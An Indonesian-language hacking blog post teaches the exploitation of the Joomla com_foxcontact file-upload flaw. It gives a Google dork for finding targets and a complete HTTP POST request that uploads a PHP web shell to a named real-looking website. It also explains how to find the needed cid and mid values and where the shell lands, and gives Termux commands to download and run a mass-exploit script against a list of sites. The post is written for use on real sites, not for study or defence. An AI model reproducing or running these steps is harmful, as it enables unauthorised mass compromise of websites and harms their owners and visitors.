Breaking

Thursday, 11 June 2020

Joomla com_foxcontact exploit

Hello world! hari ini admin share tutor exploit com_foxcontact, ni exploit jadoel tapi gk dosa juga klo di share xixi langsung aja bos. Btw disini alat yg w pake http header dan mass exploitna abang-abang Indoxploit

DORK: inurl:/index.php?option=com_foxcontact

Pertama pake http header dulu buat upshell nya yakan, lo bisa pake Burpsuite klu di pc atau Sandroproxy klu di Android.
Karena w pake Android disini w share pake Sandroproxy eaea.
Dan ini adalah requestan aink dari Sandroproxy

------------------------------
POST https://joannarusin.com/components/com_foxcontact/lib/file-uploader.php?cid=0&mid=213&qqfile=shell.php HTTP/1.1
Host:joannarusin.com
User-Agent:Mozilla/5.0 (Windows NT 5.0; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:en-us,en;q=0.5
Accept-Encoding:gzip, deflate
Proxy-Connection:keep-alive
Referer:http://code.google.com/p/sandrop/
Cache-Control:no-cache
X-Requested-With:acr.browser.barebones
X-File-Name:shell.php
Content-Type:image/jpeg
Connection:keep-alive
Pragma:no-cache
Content-length:3

"Shell code goes here"
-------------------------------

Dibagian POST, urlna jangan lupa sertain cid dan mid na, gimana carana?
Ke homepage target lalu view sourcenya caranya ctrl+u di desktop atau ketik view-source: didepan web lo (view-source:localhost)
lalu cari <a name=" disana bakal muncul cid & mid na.
Bos, mid na muncul tapi kok cid na ora? ywdh kasih 0 aja ke cid na atau pun sebaliknya klu misalna mid na yg kosong h3h3.
Akses shell nya ndi? localhost/components/com_foxcontact/uploads/shell.php.

Dan sekarang dengan mass exploit buatan Indoxploit, cara installnya (termux)

$pkg install php
$pkg install wget
$wget https://raw.githubusercontent.com/kyo1337/com_foxcontact/master/com_foxcontact.php
$php com_foxcontact.php list.txt


Tinggal salin url shellnya


Ok sampe sini dulu bos artikel nya jangan lupa laik komen dan saskreb klu cinta admin karena nnti admin akan adakan giveaway alok ok bye.


2 comments: